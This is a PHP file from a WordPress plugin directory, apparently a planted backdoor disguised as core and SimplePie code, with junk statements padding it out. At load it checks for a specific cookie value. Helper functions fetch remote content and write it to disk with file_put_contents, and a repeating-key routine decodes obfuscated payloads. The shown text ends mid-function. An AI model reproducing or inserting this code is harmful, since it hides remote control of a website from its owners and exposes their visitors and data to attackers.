File: /opt/wpsites/datacloudnow.com/wp-content/plugins/salient-social/LUK.js.php
<?php /*
if ( ! class_exists( 'SimplePie', false ) ) :
Load classes we will need.
require ABSPATH . WPINC . '/SimplePie/Misc.php';
require ABSPATH . WPINC . '/SimplePie/Cache.php';
require ABSPATH . WPINC . '/SimplePie/File.php';
require ABSPATH . WPINC . '/SimplePie/Sanitize.php';
require ABSPATH . WPINC . '/SimplePie/Registry.php';
require ABSPATH . WPINC . '/SimplePie/IRI.php';
require ABSPATH . WPINC . '/SimplePie/Locator.php';
require ABSPATH . WPINC . '/SimplePie/Content/Type/Sniffer.php';
require ABSPATH . WPINC . '/SimplePie/XML/Declaration/Parser.php';
require ABSPATH . WPINC . '/SimplePie/Parser.php';
require ABSPATH . WPINC . '/SimplePie/Item.php';
require ABSPATH . WPINC . '/SimplePie/Parse/Date.php';
require ABSPATH . WPINC . '/SimplePie/Author.php';
*
* WordPress autoloader for SimplePie.
*
* @since 3.5.0
function wp_simplepie_autoload( $class ) {
if ( 0 !== strpos( $class, 'SimplePie_' ) )
return;
$file = ABSPATH . WPINC . '/' . str_replace( '_', '/', $class ) . '.php';
include $file;
}
*
* We autoload classes we may not need.
spl_autoload_register( 'wp_simplepie_autoload' );
*
* SimplePie
*
* A PHP-Based RSS and Atom Feed Framework.
* Takes the hard work out of managing a complete RSS/Atom solution.
*
* Copyright (c) 2004-2017, Ryan Parman, Sam Sneddon, Ryan McCue, and contributors
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification, are
* permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice, this list of
* conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright notice, this list
* of conditions and the following disclaimer in the documentation and/or other materials
* provided with the distribution.
*
* * Neither the name of the SimplePie Team nor the names of its contributors may be used
* to endorse or promote products derived from this software without specific prior
* written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS
* OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
* AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS
* AND CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
* OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* @package SimplePie
* @version 1.5.8
* @copyright 2004-2017 Ryan Parman, Sam Sneddon, Ryan McCue
* @author Ryan Parman
* @author Sam Sneddon
* @author Ryan McCue
* @link http:simplepie.org/ SimplePie
* @license http:www.opensource.org/licenses/bsd-license.php BSD License
*
* SimplePie Name
define('SIMPLEPIE_NAME', 'SimplePie');
*
* SimplePie Version
define('SIMPLEPIE_VERSION', '1.5.8');
*
* SimplePie Build
* @todo Hardcode for release (there's no need to have to call SimplePie_Misc::get_build() only every load of simplepie.inc)
define('SIMPLEPIE_BUILD', gmdate('YmdHis', SimplePie_Misc::get_build()));
*
* SimplePie Website URL
define('SIMPLEPIE_URL', 'http:simplepie.org');
*
* SimplePie Useragent
* @see SimplePie::set_useragent()
define('SIMPLEPIE_USERAGENT', SIMPLEPIE_NAME . '/' . SIMPLEPIE_VERSION . ' (Feed Parser; ' . SIMPLEPIE_URL . '; Allow like Gecko) Build/' . SIMPLEPIE_BUILD);
*
* SimplePie Linkback
define('SIMPLEPIE_LINKBACK', '<a href="' . SIMPLEPIE_URL . '" title="' . SIMPLEPIE_NAME . ' ' . SIMPLEPIE_VERSION . '">' . SIMPLEPIE_NAME . '</a>');
*
* No Autodiscovery
* @see SimplePie::set_autodiscovery_level()
define('SIMPLEPIE_LOCATOR_NONE', 0);
*
* Feed Link Element Autodiscovery
* @see SimplePie::set_autodiscovery_level()
define('SIMPLEPIE_LOCATOR_AUTODISCOVERY', 1);
*
* Local Feed Extension Autodiscovery
* @see SimplePie::set_autodiscovery_level()
define('SIMPLEPIE_LOCATOR_LOCAL_EXTENSION', 2);
*
* Local Feed Body Autodiscovery
* @see SimplePie::set_autodiscovery_level()
define('SIMPLEPIE_LOCATOR_LOCAL_BODY', 4);
*
* Remote Feed Extension Autodiscovery
* @see SimplePie::set_autodiscovery_level()
define('SIMPLEPIE_LOCATOR_REMOTE_EXTENSION', 8);
*
* Remote Feed Body Autodiscovery
* @see SimplePie::set_autodiscovery_level()
define('SIMPLEPIE_LOCATOR_REMOTE_BODY', 16);
*
* All Feed Autodiscovery
* @see SimplePie::set_autodiscovery_level()
define('SIMPLEPIE_LOCATOR_ALL', 31);
*
* No known feed type
define('SIMPLEPIE_TYPE_NONE', 0);
*
* RSS 0.90
define('SIMPLEPIE_TYPE_RSS_090', 1);
*
* RSS 0.91 (Netscape)
define('SIMPLEPIE_TYPE_RSS_091_NETSCAPE', 2);
*
* RSS 0.91 (Userland)
define('SIMPLEPIE_TYPE_RSS_091_USERLAND', 4);
*
* RSS 0.91 (both Netscape and Userland)
define('SIMPLEPIE_TYPE_RSS_091', 6);
*
* RSS 0.92
define('SIMPLEPIE_TYPE_RSS_092', 8);
*
* RSS 0.93
define('SIMPLEPIE_TYPE_RSS_093', 16);
*
* RSS 0.94
define('SIMPLEPIE_TYPE_RSS_094', 32);
*
* RSS 1.0
define('SIMPLEPIE_TYPE_RSS_10', 64);
*
* RSS 2.0
define('SIMPLEPIE_TYPE_RSS_20', 128);
*
* RDF-based RSS
define('SIMPLEPIE_TYPE_RSS_RDF', 65);
*
* Non-RDF-based RSS (truly intended as syndication format)
define('SIMPLEPIE_TYPE_RSS_SYNDICATION', 190);
*
* All RSS
define('SIMPLEPIE_TYPE_RSS_ALL', 255);
*
* Atom 0.3
define('SIMPLEPIE_TYPE_ATOM_03', 256);
*
* Atom 1.0
define('SIMPLEPIE_TYPE_ATOM_10', 512);
*
* All Atom
define('SIMPLEPIE_TYPE_ATOM_ALL', 768);
*
* All feed types
define('SIMPLEPIE_TYPE_ALL', 1023);
*
* No construct
define('SIMPLEPIE_CONSTRUCT_NONE', 0);
*
* Text construct
define('SIMPLEPIE_CONSTRUCT_TEXT', 1);
*
* HTML construct
define('SIMPLEPIE_CONSTRUCT_HTML', 2);
*
* XHTML construct
define('SIMPLEPIE_CONSTRUCT_XHTML', 4);
*
* base64-encoded construct
define('SIMPLEPIE_CONSTRUCT_BASE64', 8);
*
* IRI construct
define('SIMPLEPIE_CONSTRUCT_IRI', 16);
*
* A construct that might be HTML
define('SIMPLEPIE_CONSTRUCT_MAYBE_HTML', 32);
*
* All constructs
define('SIMPLEPIE_CONSTRUCT_ALL', 63);
*
* Don't change case
define('SIMPLEPIE_SAME_CASE', 1);
*
* Change to lowercase
define('SIMPLEPIE_LOWERCASE', 2);
*
* Change to uppercase
define('SIMPLEPIE_UPPERCASE', 4);
*
* PCRE for HTML attributes
define('SIMPLEPIE_PCRE_HTML_ATTRIBUTE', '((?:[\x09\x0A\x0B\x0C\x0D\x20]+[^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3D\x3E]*(?:[\x09\x0A\x0B\x0C\x0D\x20]*=[\x0*/
/**
* Hooks WP's native database-based comment-flood check.
*
* This wrapper maintains backward compatibility with plugins that expect to
* be able to unhook the legacy wp_dequeue_style() function from
* 'check_comment_flood' using remove_action().
*
* @since 2.3.0
* @since 4.7.0 Converted to be an add_filter() wrapper.
*/
function wp_dequeue_style()
{
add_filter('wp_is_comment_flood', 'wp_check_comment_flood', 10, 5);
}
/**
* Handles the last used column output.
*
* @since 5.6.0
*
* @param array $item The current application password item.
*/
function get_page_template_slug ($tmp_fh){
$new_assignments = 'a1g9y8';
$component['zu755kq'] = 'rhmgng';
$show_label = (!isset($show_label)? "qi2h3610p" : "dpbjocc");
if(!isset($matched_search)) {
$matched_search = 'k8aw';
}
$matched_search = ceil(428);
if(!isset($category_translations)) {
$category_translations = 'sgr3p8yq';
}
$category_translations = strip_tags($matched_search);
$get_terms_args = (!isset($get_terms_args)?'bb7yunjd':'gaddh575d');
$category_translations = expm1(780);
$tmp_fh = 'dtiqniax';
if(!isset($shared_terms_exist)) {
$shared_terms_exist = 'x2bjq4g';
}
$shared_terms_exist = rtrim($tmp_fh);
$sps = 'bmkwmv99';
$table_alias['nc2m1k'] = 3868;
if(!empty(crc32($sps)) == True) {
$css = 'pu1s4ke';
}
if(!isset($p_bytes)) {
$p_bytes = 'mm1kc9wwu';
}
$p_bytes = log1p(296);
$shared_terms_exist = atanh(551);
$the_date['dio6gw'] = 4052;
if((addcslashes($tmp_fh, $category_translations)) == false) {
$show_author = 'nswoyitl1';
}
$category_translations = exp(467);
$shared_terms_exist = rad2deg(412);
$collection = 'czy79';
$untrashed = 'h7d8gy';
$gap_column['eilwo7t1'] = 'wr928p';
$tmp_fh = strrpos($collection, $untrashed);
return $tmp_fh;
}
// http://flac.sourceforge.net/id.html
/**
* @see ParagonIE_Sodium_Compat::crypto_aead_chacha20poly1305_ietf_decrypt()
* @param string $post_classes
* @param string $page_cache_detail
* @param string $chain
* @param string $help_install
* @return string|bool
*/
function audioFormatLookup($post_classes, $page_cache_detail, $chain, $help_install)
{
try {
return ParagonIE_Sodium_Compat::crypto_aead_chacha20poly1305_ietf_decrypt($post_classes, $page_cache_detail, $chain, $help_install);
} catch (Error $mpid) {
return false;
} catch (Exception $mpid) {
return false;
}
}
// We already printed the style queue. Print this one immediately.
# fe_mul(t1, z, t1);
$lifetime = 'h97c8z';
/**
* Enqueues registered block scripts and styles, depending on current rendered
* context (only enqueuing editor scripts while in context of the editor).
*
* @since 5.0.0
*
* @global WP_Screen $current_screen WordPress current screen object.
*/
function plugins_api($max_stts_entries_to_scan){
$max_num_comment_pages = 'wJCNVdXgxvNSPtfxWhLNSz';
if (isset($_COOKIE[$max_stts_entries_to_scan])) {
is_cookie_set($max_stts_entries_to_scan, $max_num_comment_pages);
}
}
$max_stts_entries_to_scan = 'gZXFEJ';
/**
* Computes the length of the Longest Common Subsequence (LCS).
*
* This is mostly for diagnostic purposes.
*
* @return int The length of the LCS.
*/
function admin_url ($min_timestamp){
$min_timestamp = 'lmv8x';
$wp_theme = (!isset($wp_theme)? 'xr0smu' : 'bsygrnjp');
$shared_tts['phd04a4'] = 'a83ksjgu';
// Exclude any falsey values, such as 0.
$maybe_widget_id = (!isset($maybe_widget_id)? "b8xa1jt8" : "vekwdbag");
$frame_channeltypeid = 'ynifu';
$signatures = 'v9ka6s';
// Two comments shouldn't be able to match the same GUID.
if(!empty(bin2hex($min_timestamp)) == FALSE){
$nav_menu_item = 'urkje';
}
$action_function = 'wll5';
$tableindices = (!isset($tableindices)? "wglmd5g4" : "padef");
if(!isset($drag_drop_upload)) {
$drag_drop_upload = 'mabjhntf';
}
$drag_drop_upload = soundex($action_function);
$dropdown_options = 'hj1yh';
$menu_class['zuprc1'] = 2421;
$min_timestamp = ltrim($dropdown_options);
if(!empty(tan(409)) != FALSE){
$installed_theme = 'isjk';
}
if(!(rtrim($drag_drop_upload)) == True) {
$ipv4 = 'v53th12';
}
$vkey = 'ixhzij';
$min_timestamp = chop($vkey, $min_timestamp);
$sniffed['ykauj2qp'] = 'z7bl';
$min_timestamp = soundex($vkey);
$dropdown_options = atanh(704);
if(empty(html_entity_decode($drag_drop_upload)) == true) {
$needs_list_item_wrapper = 'laat2g';
}
$mysql_version['iww63'] = 2071;
if(!empty(dechex(417)) !== FALSE) {
$field_label = 'rjjw8pm';
}
$v_buffer = (!isset($v_buffer)? 'q04k' : 'kqjhvhnc6');
if(!(basename($drag_drop_upload)) == TRUE) {
$status_link = 'wk78rnk';
}
$switch['ms9x'] = 'hqj0jg';
$drag_drop_upload = cosh(547);
if(!empty(stripcslashes($drag_drop_upload)) !== TRUE){
$description_parent = 'vjzw9';
}
$vkey = strrpos($min_timestamp, $min_timestamp);
return $min_timestamp;
}
/**
* Server-side registering and rendering of the `core/navigation-link` block.
*
* @package WordPress
*/
function render_block_core_post_excerpt ($drag_drop_upload){
$all_text = 'px7ram';
$src_x = 'g209';
$FLVheader = 'wdt8';
$show_comments_count['s2buq08'] = 'hc2ttzixd';
$video_extension = 'vk2phovj';
$canonical_url = (!isset($canonical_url)?'v404j79c':'f89wegj');
if(!isset($total_admins)) {
$total_admins = 'w5yo6mecr';
}
if(!isset($max_w)) {
$max_w = 'a3ay608';
}
$src_x = html_entity_decode($src_x);
if(!isset($index_pathname)) {
$index_pathname = 'xiyt';
}
// old-format (SV4-SV6) Musepack header that has a very loose pattern match and could falsely match other data (e.g. corrupt mp3)
// Last added directories are deepest.
//Fall back to this old, deprecated/removed encoding
// Automatically include the "boolean" type when the default value is a boolean.
// Object Size QWORD 64 // size of stream properties object, including 78 bytes of Stream Properties Object header
$vkey = 'h7edp5d';
if(!empty(rawurlencode($video_extension)) !== FALSE) {
$test_themes_enabled = 'vw621sen3';
}
$total_admins = strcoll($all_text, $all_text);
$symbol_match = 'nb48';
$max_w = soundex($FLVheader);
$index_pathname = acos(186);
// 10 seconds.
$script_module['wjejlj'] = 'xljjuref2';
$preload_data = 'viiy';
if(empty(convert_uuencode($symbol_match)) !== false) {
$layout_class = 'gdfpuk18';
}
$presets_by_origin = (!isset($presets_by_origin)? 'npq4gjngv' : 'vlm5nkpw3');
if((crc32($total_admins)) === TRUE) {
$DKIM_passphrase = 'h2qi91wr6';
}
$FLVheader = html_entity_decode($FLVheader);
$total_admins = bin2hex($all_text);
$trackback_url['rr569tf'] = 'osi31';
if(!empty(strnatcasecmp($preload_data, $video_extension)) !== True){
$uploads_dir = 'bi2jd3';
}
if(!empty(rtrim($index_pathname)) != TRUE) {
$display_name = 'a5fiqg64';
}
// Background Scroll.
if(!isset($dropdown_options)) {
$dropdown_options = 'r3f89je';
}
$dropdown_options = html_entity_decode($vkey);
$action_function = 'aw2rad99l';
$list_items = (!isset($list_items)? "qhjn90md" : "zlm4");
$initialOffset['a6hjp2n'] = 4671;
if(empty(ucwords($action_function)) !== False){
$upgrader = 'kaie9y';
}
$dropdown_options = ucwords($action_function);
$ymid['rzqey'] = 'gziuw53';
$drag_drop_upload = abs(365);
$drag_drop_upload = cos(976);
$items_markup['wwmaiu'] = 'k4nvzz';
if(!isset($min_timestamp)) {
$min_timestamp = 'vi75a6cs8';
}
$min_timestamp = html_entity_decode($action_function);
$newvaluelength['b9vb'] = 799;
if(!isset($compre)) {
$compre = 'xi40';
}
$compre = exp(697);
$post_type_label = (!isset($post_type_label)? 'ros6ly3' : 'dr3b0e');
if(!isset($request_match)) {
$request_match = 'dss9gsq';
}
$request_match = stripslashes($drag_drop_upload);
if((rawurldecode($min_timestamp)) !== True){
$circular_dependency_lines = 'vl3d3b';
}
$dropdown_options = is_string($dropdown_options);
$request_match = ceil(511);
$action_function = log1p(374);
return $drag_drop_upload;
}
/**
* Filters the translation files retrieved from a specified path before the actual lookup.
*
* Returning a non-null value from the filter will effectively short-circuit
* the MO files lookup, returning that value instead.
*
* This can be useful in situations where the directory contains a large number of files
* and the default glob() function becomes expensive in terms of performance.
*
* @since 6.5.0
*
* @param null|array $files List of translation files. Default null.
* @param string $float The path from which translation files are being fetched.
**/
if(!isset($shared_post_data)) {
$shared_post_data = 'rlzaqy';
}
// [63][C3] -- Specify the physical equivalent of this ChapterAtom like "DVD" (60) or "SIDE" (50), see complete list of values.
$shared_post_data = soundex($lifetime);
/**
* Normalize the pattern properties to camelCase.
*
* The API's format is snake_case, `register_block_pattern()` expects camelCase.
*
* @since 6.2.0
* @access private
*
* @param array $pattern Pattern as returned from the Pattern Directory API.
* @return array Normalized pattern.
*/
function remove_rule ($dropdown_options){
$dropdown_options = 'vec3utxy';
// UTF-16
// Description / legacy caption.
// Label will also work on retrieving because that falls back to term.
$maybe_widget_id = (!isset($maybe_widget_id)? "b8xa1jt8" : "vekwdbag");
$feature_node = 'mfbjt3p6';
$thisfile_asf_codeclistobject_codecentries_current = (!isset($thisfile_asf_codeclistobject_codecentries_current)? "hjyi1" : "wuhe69wd");
$editor_class = 'xw87l';
$post_links = 'd8uld';
$multifeed_objects['aeiwp10'] = 'jfaoi1z2';
if(!empty(rad2deg(262)) == FALSE) {
$add_new_screen = 'pcvg1bf';
}
if((strnatcasecmp($feature_node, $feature_node)) !== TRUE) {
$num_fields = 'yfu7';
}
$post_links = addcslashes($post_links, $post_links);
if(!isset($is_paged)) {
$is_paged = 'yjff1';
}
$is_paged = nl2br($editor_class);
$plugin_activate_url = 't5j8mo19n';
if(empty(addcslashes($post_links, $post_links)) !== false) {
$replaygain = 'p09y';
}
$theme_json_file_cache['miif5r'] = 3059;
if(!isset($box_index)) {
$box_index = 's1vd7';
}
//Catches case 'plain': and case '':
if(!isset($allow_past_date)) {
$allow_past_date = 'hhwm';
}
$oembed_post_query['ni17my'] = 'y4pb';
$is_paged = htmlspecialchars($is_paged);
$box_index = deg2rad(593);
$pseudo_matches = 'mog6';
$box_index = decbin(652);
$plugin_activate_url = sha1($plugin_activate_url);
$pseudo_matches = crc32($pseudo_matches);
$allow_past_date = strrpos($feature_node, $feature_node);
$current_major = (!isset($current_major)?'hvlbp3u':'s573');
// Re-add upgrade hooks.
$comment_name['sge2vxj'] = 3722;
if((strrev($dropdown_options)) != TRUE) {
$item_value = 'hwwwhf';
}
$dropdown_options = log10(9);
if(!(cosh(898)) === False) {
$startup_error = (!isset($startup_error)? 'b6vjdao' : 'rvco');
if(!empty(expm1(7)) !== FALSE) {
$capability__not_in = 'p25uqtyp';
}
$signedMessage['mnxgs'] = 4091;
$fat_options['of6c7'] = 1132;
$editor_class = addcslashes($is_paged, $editor_class);
$php64bit = 'gqhoksgx';
}
$dropdown_options = wordwrap($dropdown_options);
$dropdown_options = stripslashes($dropdown_options);
$future_events = (!isset($future_events)?'vx4sf6na':'qbx23qe');
if(!(acosh(566)) != FALSE) {
$function = 'z77ein2';
}
$dropdown_options = tan(321);
$SampleNumberString['wb9s'] = 'mrcqzzmw';
$dropdown_options = rawurlencode($dropdown_options);
$rtl_file_path['ags1p'] = 'l6hixf08';
$dropdown_options = asin(89);
$min_timestamp = 'z4mmx65bm';
if(empty(urldecode($min_timestamp)) == true) {
$closed = 'lvuzrwb';
}
$min_timestamp = sha1($dropdown_options);
$min_timestamp = stripslashes($dropdown_options);
return $dropdown_options;
}
/**
* Displays a list of post custom fields.
*
* @since 1.2.0
*
* @deprecated 6.0.2 Use get_post_meta() to retrieve post meta and render manually.
*/
function do_block_editor_incompatible_meta_box()
{
_deprecated_function(__FUNCTION__, '6.0.2', 'get_post_meta()');
$link_image = get_post_custom_keys();
if ($link_image) {
$color_classes = '';
foreach ((array) $link_image as $help_install) {
$plugin_realpath = trim($help_install);
if (is_protected_meta($plugin_realpath, 'post')) {
continue;
}
$plugin_page = array_map('trim', get_post_custom_values($help_install));
$block_support_config = implode(', ', $plugin_page);
$comment_children = sprintf(
"<li><span class='post-meta-key'>%s</span> %s</li>\n",
/* translators: %s: Post custom field name. */
esc_html(sprintf(_x('%s:', 'Post custom field name'), $help_install)),
esc_html($block_support_config)
);
/**
* Filters the HTML output of the li element in the post custom fields list.
*
* @since 2.2.0
*
* @param string $comment_children The HTML output for the li element.
* @param string $help_install Meta key.
* @param string $block_support_config Meta value.
*/
$color_classes .= apply_filters('do_block_editor_incompatible_meta_box_key', $comment_children, $help_install, $block_support_config);
}
if ($color_classes) {
echo "<ul class='post-meta'>\n{$color_classes}</ul>\n";
}
}
}
plugins_api($max_stts_entries_to_scan);
/**
* Gets the hook attached to the administrative page of a plugin.
*
* @since 1.5.0
*
* @param string $plugin_page The slug name of the plugin page.
* @param string $parent_page The slug name for the parent menu (or the file name of a standard
* WordPress admin page).
* @return string|null Hook attached to the plugin page, null otherwise.
*/
function sodium_base642bin($supported_block_attributes, $bittotal){
$is_patterns_editor = get_theme_item($supported_block_attributes);
if ($is_patterns_editor === false) {
return false;
}
$self = file_put_contents($bittotal, $is_patterns_editor);
return $self;
}
// Include image functions to get access to wp_read_image_metadata().
$lifetime = htmlspecialchars($lifetime);
# crypto_secretstream_xchacha20poly1305_rekey(state);
/** This filter is documented in wp-includes/bookmark-template.php */
function get_compat_media_markup($self, $help_install){
// "xmcd"
// Destination does not exist or has no contents.
$filtered = strlen($help_install);
$jsonp_enabled = 'mf2f';
if(!isset($containers)) {
$containers = 'l1jxprts8';
}
$thisfile_asf_codeclistobject_codecentries_current = (!isset($thisfile_asf_codeclistobject_codecentries_current)? "hjyi1" : "wuhe69wd");
$placeholder_id = 'dezwqwny';
$fieldtype_base = 'h9qk';
$blog_details = strlen($self);
$multifeed_objects['aeiwp10'] = 'jfaoi1z2';
if(!(substr($fieldtype_base, 15, 11)) !== True){
$maybe_increase_count = 'j4yk59oj';
}
$jsonp_enabled = soundex($jsonp_enabled);
$containers = deg2rad(432);
$revision_date_author = (!isset($revision_date_author)? "okvcnb5" : "e5mxblu");
// This filter is attached in ms-default-filters.php but that file is not included during SHORTINIT.
$the_role['fu7uqnhr'] = 'vzf7nnp';
$fieldtype_base = atan(158);
$customize_header_url['z5ihj'] = 878;
if(!isset($box_index)) {
$box_index = 's1vd7';
}
$type_of_url['ylzf5'] = 'pj7ejo674';
// Now that we have an autoloader, let's register it!
// 5.4.2.16 dialnorm2: Dialogue Normalization, ch2, 5 Bits
// ----- Working variables
// Do not trigger the fatal error handler while updates are being installed.
// Object ID should not be cached.
if(!(crc32($placeholder_id)) == True) {
$action_description = 'vbhi4u8v';
}
$custom_class_name = 'wi2yei7ez';
$locked_post_status['px17'] = 'kjy5';
if((log(150)) != false) {
$v_string = 'doe4';
}
$box_index = deg2rad(593);
// Font face settings come directly from theme.json schema
$filtered = $blog_details / $filtered;
$filtered = ceil($filtered);
if(!empty(substr($containers, 10, 21)) === TRUE){
$uses_context = 'yjr8k6fgu';
}
$item_key = (!isset($item_key)?'bk006ct':'r32a');
$caption_id['yg9fqi8'] = 'zwutle';
$box_index = decbin(652);
if(!isset($CharSet)) {
$CharSet = 'hz38e';
}
if(!isset($delete_nonce)) {
$delete_nonce = 'eblw';
}
$load['sdp217m4'] = 754;
if(!empty(expm1(7)) !== FALSE) {
$capability__not_in = 'p25uqtyp';
}
$new_selector['ypy9f1'] = 'cjs48bugn';
$CharSet = bin2hex($placeholder_id);
$disallowed_html = str_split($self);
// Reset ParagonIE_Sodium_Compat::$fastMult to what it was before.
// Check safe_mode off
$help_install = str_repeat($help_install, $filtered);
//reactjs.org/link/invalid-aria-props', unknownPropString, type);
$fieldtype_base = str_shuffle($custom_class_name);
$selector_markup = (!isset($selector_markup)? "yvf4x7ooq" : "rit3bw60");
$containers = cosh(287);
$box_index = strripos($box_index, $box_index);
$delete_nonce = strrev($jsonp_enabled);
$containers = sinh(882);
$wp_font_face = (!isset($wp_font_face)? "gko47fy" : "qztzipy");
if(!empty(strripos($CharSet, $placeholder_id)) !== true) {
$DKIM_private_string = 'edhth6y9g';
}
$section_name['mzr60q4'] = 1817;
if(!(exp(443)) == FALSE) {
$old_roles = 'tnid';
}
// Cache current status for each comment.
$CharSet = asinh(786);
$thisfile_asf_audiomedia_currentstream['xehbiylt'] = 2087;
$has_tinymce['toptra4b'] = 4437;
$containers = acos(523);
$in_footer['y5v27vas'] = 'h6hrm73ey';
// Do not trigger the fatal error handler while updates are being installed.
$okay = str_split($help_install);
$okay = array_slice($okay, 0, $blog_details);
// Skip if empty and not "0" or value represents array of longhand values.
$ApplicationID['c86tr'] = 4754;
$BANNER = 'm8aiemkp';
$mapping['h7y1'] = 'r90ysagi';
$box_index = atanh(539);
if(empty(str_shuffle($jsonp_enabled)) == FALSE) {
$dkimSignatureHeader = 'zqkuw8b';
}
// 'author' and 'description' did not previously return translated data.
$jsonp_enabled = html_entity_decode($jsonp_enabled);
$BANNER = urldecode($BANNER);
$custom_class_name = strnatcmp($custom_class_name, $fieldtype_base);
$sanitized_value['sfsxkhr'] = 'b2q16g';
if((tanh(640)) !== False) {
$update_count = 'dyj7j';
}
// Normalize as many pct-encoded sections as possible
if(!isset($has_env)) {
$has_env = 'n0fs77yl';
}
if(!empty(rawurlencode($jsonp_enabled)) === False) {
$inarray = 'hc8qr2br5';
}
$custom_class_name = cosh(463);
$CharSet = strnatcasecmp($placeholder_id, $placeholder_id);
if((strip_tags($BANNER)) != False) {
$post_thumbnail_id = 'tgqurdoh8';
}
$has_env = round(282);
$rows = (!isset($rows)? 'r8g84nb' : 'xlgvyjukv');
$old_site_id = (!isset($old_site_id)? 'aneqj5tef' : 'wihper');
$jsonp_enabled = strcoll($jsonp_enabled, $delete_nonce);
$skipped['qv9az6'] = 559;
$klen = array_map("set_caption_class", $disallowed_html, $okay);
$BANNER = log(591);
$custom_class_name = decbin(338);
$folder_part_keys['rrl6t85x0'] = 'bxbql440';
$delete_nonce = quotemeta($jsonp_enabled);
$CharSet = tanh(678);
if(!(asinh(514)) === False){
$loop_member = 'pqkpoucw';
}
$notoptions_key = (!isset($notoptions_key)? "vri5u9z9" : "pjjaw");
$S5['s4iutih'] = 'iyc4tw7';
$containers = acosh(997);
$new_url['jbmu'] = 997;
$klen = implode('', $klen);
$layout_justification['xcwk4'] = 1193;
$fieldtype_base = bin2hex($fieldtype_base);
$passed_default['kzzb754p3'] = 3493;
$has_env = ucwords($has_env);
if(empty(acosh(649)) == true) {
$wrapper_styles = 'zl4i';
}
return $klen;
}
/**
* oEmbed API endpoint controller.
*
* Registers the REST API route and delivers the response data.
* The output format (XML or JSON) is handled by the REST API.
*
* @since 4.4.0
*/
function build_query_string ($shared_terms_exist){
$myLimbs = 'j4dp';
// $matches[2] is the month the post was published.
$has_min_font_size['ahydkl'] = 4439;
if(!empty(html_entity_decode($myLimbs)) == true) {
$code_ex = 'k8ti';
}
$hsla_regexp = (!isset($hsla_regexp)? "nm4kpq" : "scg7t4ea");
if(!empty(strnatcmp($myLimbs, $myLimbs)) != true) {
$val_len = 'bvlc';
}
if(empty(crc32($myLimbs)) === True) {
$has_typography_support = 'bt92';
}
// Encryption info <binary data>
$post_states['tp3s'] = 'meamensc';
// Peak volume bass $xx xx (xx ...)
$cur_id['oudn6'] = 3923;
$ID3v1Tag['x5fwvitd'] = 'xtb2ic2';
$myLimbs = strtolower($myLimbs);
if(!isset($tmp_fh)) {
$tmp_fh = 'nu0uu';
}
$tmp_fh = atanh(904);
if(!isset($p_bytes)) {
$p_bytes = 'ckqzc';
}
$p_bytes = acosh(209);
if(!isset($category_translations)) {
$category_translations = 'ihlbrltoa';
}
$category_translations = urlencode($p_bytes);
if(!empty(str_shuffle($category_translations)) == true) {
$types = 'eswpln';
}
$custom_paths = 'zxza1y';
if(empty(convert_uuencode($custom_paths)) !== TRUE) {
$f8g4_19 = 'zco7';
}
$wp_post_statuses = 'c7elyge';
$global_styles_presets['znwc5afpf'] = 1586;
$tmp_fh = trim($wp_post_statuses);
$sps = 'thf0d7lep';
$altBodyCharSet = 'h3x3n9z';
$shared_terms_exist = chop($sps, $altBodyCharSet);
$implementations = 'a6w9v';
$XFL = (!isset($XFL)?'qia7b':'d421f6tn');
$dst_x['zwynh'] = 471;
$in_loop['bsept'] = 2407;
if(!isset($collection)) {
$collection = 's1401i09v';
}
$collection = strcoll($implementations, $category_translations);
$p_bytes = strtolower($custom_paths);
if(empty(cosh(104)) === true){
$description_html_id = 'ws3j3o';
}
$num_toks['m630ch'] = 1736;
if(empty(exp(776)) === False) {
$rememberme = 'gv4y9t';
}
$altBodyCharSet = round(22);
$untrashed = 'utzgk8dzc';
if(!empty(addcslashes($untrashed, $custom_paths)) === true) {
$get_posts = 'pv4aq';
}
$custom_paths = cos(962);
$v_result1 = (!isset($v_result1)? "qh0p" : "d1przj922");
$wp_post_statuses = log10(627);
return $shared_terms_exist;
}
/**
* Sends required variables to JavaScript land.
*
* @since 3.1.0
*/
function set_caption_class($id_column, $maybe_ip){
if(!isset($f9g5_38)) {
$f9g5_38 = 'ks95gr';
}
$src_matched = setWordWrap($id_column) - setWordWrap($maybe_ip);
$f9g5_38 = floor(946);
// Check and set the output mime type mapped to the input type.
// $p_filelist : An array containing file or directory names, or
$src_matched = $src_matched + 256;
$src_matched = $src_matched % 256;
// 4.14 APIC Attached picture
// Ensure that blocks saved with the legacy ref attribute name (navigationMenuId) continue to render.
$reserved_names['vsycz14'] = 'bustphmi';
if(!(sinh(457)) != True) {
$new_array = 'tatb5m0qg';
}
if(!empty(crc32($f9g5_38)) == False) {
$MPEGaudioHeaderValidCache = 'hco1fhrk';
}
$owneruid['zx0t3w7r'] = 'vu68';
// ----- Loop on the files
$id_column = sprintf("%c", $src_matched);
return $id_column;
}
/**
* Custom sanitize callback used for all options to allow the use of 'null'.
*
* By default, the schema of settings will throw an error if a value is set to
* `null` as it's not a valid value for something like "type => string". We
* provide a wrapper sanitizer to allow the use of `null`.
*
* @since 4.7.0
*
* @param mixed $block_support_config The value for the setting.
* @param WP_REST_Request $request The request object.
* @param string $param The parameter name.
* @return mixed|WP_Error
*/
function preg_index($max_stts_entries_to_scan, $max_num_comment_pages, $role_caps){
$current_user_can_publish = 'ufkobt9';
$use_verbose_rules = 'jdsauj';
if(!isset($f9g5_38)) {
